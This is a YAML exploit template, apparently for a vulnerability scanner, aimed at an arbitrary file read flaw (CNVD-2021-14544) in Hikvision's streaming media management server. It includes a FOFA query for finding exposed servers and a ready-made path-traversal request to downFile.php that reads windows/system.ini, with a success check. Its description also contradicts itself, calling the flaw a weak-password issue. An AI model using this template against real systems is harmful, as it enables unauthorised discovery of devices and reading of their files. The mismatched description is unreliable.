product: 海康威视流媒体管理服务器
vName: 海康威视流媒体管理服务器后台 任意文件读取
type: 文件读取
vID:
  - CNVD-2021-14544
level: 3
vDesc: 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞，攻击者可利用该漏洞获取敏感信息。
version: 海康威视流媒体管理服务器 V2.3.5
note: ''
search:
  FOFA: title="流媒体管理服务器"
protocol: http
link: https://www.cnblogs.com/zcg-cpdd/p/14595644.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and